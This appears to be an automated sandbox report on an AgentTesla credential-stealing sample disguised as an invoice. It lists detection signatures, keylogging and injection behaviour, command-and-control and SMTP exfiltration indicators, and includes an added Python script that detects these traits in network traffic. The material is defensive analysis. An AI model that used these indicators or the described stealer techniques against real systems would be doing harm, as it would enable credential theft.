Analysis Report Overdue_invoices.exe

Overview

General Information

Sample Name: Overdue_invoices.exe
Analysis ID: 344973
MD5: afa35ee8f27c8a6661219bccb198fd9b
SHA1: 8b86a3066a24586bd5d17ce45ce8bd7984079af0
SHA256: 2d2c26b0f3308bda9e00913401761b8b5026edccfbe12bce7a72cd2d324c2f45
Tags: exe

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
May check the online IP address of the machine
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: Overdue_invoices.exe.6020.1.memstr Malware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "", "ByHost: ": "smtp.gmail.com:5874", "Password: ": "", "From: ": ""}
Multi AV Scanner detection for submitted file
Source: Overdue_invoices.exe ReversingLabs: Detection: 17%

Compliance:

Uses 32bit PE files
Source: Overdue_invoices.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Overdue_invoices.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Networking:

May check the online IP address of the machine
Source: unknown DNS query: name: icanhazip.com (this entry appears 2 times in the report)
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49736 -> 108.177.119.109:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /base/D87080E8818FCC40A45F948026A84297.html HTTP/1.1 Host: 193.239.147.103 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 193.239.147.103 193.239.147.103
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.3:49736 -> 108.177.119.109:587
Source: unknown TCP traffic detected without corresponding DNS query: 193.239.147.103 (this entry appears 50 times in the report)
Source: global traffic HTTP traffic detected: GET /base/D87080E8818FCC40A45F948026A84297.html HTTP/1.1 Host: 193.239.147.103 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: unknown DNS traffic detected: queries for: raw.githubusercontent.com
Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://193.239.147.103
Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625972987.00000000030AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/icanhazip-faq
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.com
Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.com/
Source: Overdue_invoices.exe, 00000001.00000002.625972987.00000000030AF000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.com4
Source: Overdue_invoices.exe, 00000001.00000002.625776172.00000000018C6000.00000004.00000040.sdmp String found in binary or memory: http://ns.adobe.c/g
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Overdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmp String found in binary or memory: http://smtp.gmail.com
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/
Source: Overdue_invoices.exe, 00000001.00000002.625659765.00000000015AD000.00000004.00000020.sdmp, Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625516000.0000000001562000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/signin/continue?sarp=1&scc=1&plt=AKgnsbt
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: https://cdn.ecosia
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrom
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://i.imgur.com/9sS1RPE.png
Source: Overdue_invoices.exe, 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://mail.google.com
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: https://pki.goog/repository/0
Source: Overdue_invoices.exe, 00000001.00000002.626078559.00000000030F0000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontenP
Source: Overdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontenPf~
Source: Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/pandalog/nothing/master/john.txt
Source: Overdue_invoices.exe, 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/pandalog/nothing/master/john.txt)CqbkTHriRRbQjaArtJfFMC#
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: Overdue_invoices.exe, 00000001.00000002.626044350.00000000030E4000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.627057496.000000000337F000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.626025797.00000000030D4000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/mail/?p=WantAuthError
Source: Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/mail/answer/78754
Source: Overdue_invoices.exe, 00000000.00000002.230153111.0000000000B83000.00000004.00000020.sdmp String found in binary or memory: https://wa.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: Overdue_invoices.exe, 00000001.00000002.625659765.00000000015AD000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/defaLMEM
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0binLMEM
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/Nn
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
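Each of the Networking signatures above is a small heuristic over flow, DNS and HTTP events: a destination contacted with no preceding DNS answer (the hard-coded 193.239.147.103), HTTP requests carrying no User-Agent, a lookup of icanhazip.com before any exfiltration, and SMTP submission to 108.177.119.109:587. The following Python is an added example of those four heuristics written the way a detection engineer would reproduce them over Zeek-style logs; it is not Joe Sandbox's code. The event records are constructed: 193.239.147.103, 108.177.119.109:587 and the two request paths are taken from the report, while the RFC 5737 addresses 203.0.113.10 and 198.51.100.7 and the Mozilla/5.0 header stand in for values the report does not list.

```python
"""Network triage heuristics mirroring the report's Networking signatures.
Added example; not Joe Sandbox code.  Events are constructed inline."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List

@dataclass
class DnsAnswer:            # one resolved name -> addresses (e.g. from Zeek dns.log)
    ts: float
    name: str
    addresses: List[str]

@dataclass
class TcpConn:              # one outbound flow (e.g. from Zeek conn.log)
    ts: float
    dst_ip: str
    dst_port: int

@dataclass
class HttpRequest:          # one request with its headers (e.g. from Zeek http.log)
    ts: float
    host: str
    path: str
    headers: Dict[str, str]

# Services whose sole purpose is to return the caller's public IP; stealers
# such as AgentTesla query one before exfiltrating (the report shows icanhazip.com).
IP_CHECK_HOSTS = {"icanhazip.com", "api.ipify.org", "checkip.dyndns.org", "ifconfig.me"}
MAIL_SUBMISSION_PORTS = {25, 465, 587}
RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def _is_lan(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in RFC1918)

def undocumented_destinations(dns: List[DnsAnswer], conns: List[TcpConn]) -> List[TcpConn]:
    """'TCP traffic detected without corresponding DNS query': flows whose
    destination was not returned by any DNS answer seen earlier in the capture.
    Hard-coded C2 addresses land here; CDN and mail traffic do not, because the
    sample resolved those names first.  LAN destinations are ignored."""
    timeline = sorted([(d.ts, 0, d) for d in dns] + [(c.ts, 1, c) for c in conns],
                      key=lambda e: (e[0], e[1]))
    resolved, hits = set(), []
    for _, kind, ev in timeline:
        if kind == 0:
            resolved.update(ev.addresses)
        elif not _is_lan(ev.dst_ip) and ev.dst_ip not in resolved:
            hits.append(ev)
    return hits

def requests_without_user_agent(reqs: List[HttpRequest]) -> List[HttpRequest]:
    """'HTTP GET or POST without a user agent': .NET WebClient/HttpWebRequest
    send no User-Agent unless the author sets one; browsers always do."""
    return [r for r in reqs if not any(k.lower() == "user-agent" for k in r.headers)]

def ip_check_lookups(dns: List[DnsAnswer]) -> List[str]:
    """'May check the online IP address of the machine'."""
    return sorted({d.name.lower() for d in dns if d.name.lower() in IP_CHECK_HOSTS})

def mail_submission_flows(conns: List[TcpConn]) -> List[TcpConn]:
    """'Uses SMTP (mail sending)': outbound flows to SMTP/submission ports.
    From a workstation with no mail client this is the exfil channel."""
    return [c for c in conns if c.dst_port in MAIL_SUBMISSION_PORTS]

def triage(dns: List[DnsAnswer], conns: List[TcpConn], reqs: List[HttpRequest]) -> List[str]:
    """Run every heuristic and return one finding line per hit."""
    out = [f"conn-without-dns {c.dst_ip}:{c.dst_port}" for c in undocumented_destinations(dns, conns)]
    out += [f"http-no-user-agent http://{r.host}{r.path}" for r in requests_without_user_agent(reqs)]
    out += [f"public-ip-check {n}" for n in ip_check_lookups(dns)]
    out += [f"smtp-submission {c.dst_ip}:{c.dst_port}" for c in mail_submission_flows(conns)]
    return out

# Constructed sample capture.  193.239.147.103, 108.177.119.109:587 and the two
# request paths come from the report; the RFC 5737 addresses 203.0.113.10 and
# 198.51.100.7 stand in for answers the report does not list.
SAMPLE_DNS = [
    DnsAnswer(1.0, "icanhazip.com", ["203.0.113.10"]),
    DnsAnswer(2.0, "smtp.gmail.com", ["108.177.119.109"]),
    DnsAnswer(3.0, "raw.githubusercontent.com", ["198.51.100.7"]),
]
SAMPLE_CONNS = [
    TcpConn(1.5, "203.0.113.10", 80),
    TcpConn(2.5, "108.177.119.109", 587),
    TcpConn(3.5, "198.51.100.7", 443),
    TcpConn(4.0, "193.239.147.103", 80),     # never resolved: hard-coded in the binary
    TcpConn(4.5, "192.168.2.1", 53),         # LAN resolver, ignored
]
SAMPLE_HTTP = [
    HttpRequest(1.6, "icanhazip.com", "/",
                {"Host": "icanhazip.com", "Connection": "Keep-Alive"}),
    HttpRequest(3.6, "raw.githubusercontent.com", "/pandalog/nothing/master/john.txt",
                {"Host": "raw.githubusercontent.com", "User-Agent": "Mozilla/5.0"}),  # constructed UA
    HttpRequest(4.1, "193.239.147.103", "/base/D87080E8818FCC40A45F948026A84297.html",
                {"Host": "193.239.147.103", "Connection": "Keep-Alive"}),
]

if __name__ == "__main__":
    for line in triage(SAMPLE_DNS, SAMPLE_CONNS, SAMPLE_HTTP):
        print(line)
```

The conn-without-DNS rule only works when the DNS answers in the capture precede the flows they explain; names resolved through the hosts file (the report shows the sample reading C:\Windows\System32\drivers\etc\hosts) or over DNS-over-HTTPS produce no answer on the wire and would be flagged too, so treat a hit as a lead to confirm against the binary's strings, as the report does with the http://193.239.147.103 string found in memory.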

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to log keystrokes (.Net Source)
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs .Net Code: SetHook
Installs a global keyboard hook
Source: C:\Users\user\Desktop\Overdue_invoices.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Overdue_invoices.exe

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Executable has a suspicious name (potential lure to open the executable)
Source: Overdue_invoices.exe Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Overdue_invoices.exe
Detected potential crypto function
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 0_2_00AD73B0 0_2_00AD73B0
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 0_2_00AD6C38 0_2_00AD6C38
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 0_2_00AD5748 0_2_00AD5748
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 1_2_07EF8A38 1_2_07EF8A38
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 1_2_07EF3EC0 1_2_07EF3EC0
Sample file is different than original file name gathered from version info
Source: Overdue_invoices.exe Binary or memory string: OriginalFilename vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000002.230410070.000000000290F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamepanda.exel% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000002.230792815.00000000038E9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSHIT.dll* vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000000.209905994.0000000000402000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000002.230130488.0000000000B5A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Overdue_invoices.exe
Source: Overdue_invoices.exe Binary or memory string: OriginalFilename vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.629484659.0000000005630000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000000.225837924.0000000000DB2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.624689682.000000000041A000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamepanda.exel% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.625439956.000000000153A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.630778412.0000000006C30000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.624879877.0000000001158000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Overdue_invoices.exe
Source: Overdue_invoices.exe Binary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
Uses 32bit PE files
Source: Overdue_invoices.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Yara signature match
Source: 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs Base64 encoded string: 'MrE1thusbvL9jUnxf1Lcqml0/hEjxyBHvYQkHfU0e7ZA3dt4j2WOl2OHNkC7kY9pQCzpNPPRj8Y=', 'iMKrIqJC9ZAyLRDh/GZR6J5a0LtY5Iepg2LkeJHYP3LxSJU5ojpXjijfzghF2Psa', 'G8WwiqyHtuMi36fzoXG0WXV3alulUlvJbG26GZ78bQx4lWjg5TCCVQ==', 'MXg5VX5jLbiBy9Cm6tjOR0HiHnsHY5fMkc3wHc95wy56a7HPbHGRobIWKceNtG8f', 'G8WwiqyHtuMi36fzoXG0WXV3alulUlvJbG26GZ78bQx4lWjg5TCCVQ==', 'zSUT/U/UiMfSdmJXIlMFYstwqPXc90mjAAO6NC1KQy6trroQ+1O8lQ=='
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Sucks.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Sucks.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/6@4/4
Source: C:\Users\user\Desktop\Overdue_invoices.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Overdue_invoices.exe.log
Source: C:\Users\user\Desktop\Overdue_invoices.exe Mutant created: \Sessions\1\BaseNamedObjects\KKCDH7XDFH0WWL2TU813
Source: C:\Users\user\Desktop\Overdue_invoices.exe File created: C:\Users\user\AppData\Local\Temp\TMP_pass
Source: Overdue_invoices.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
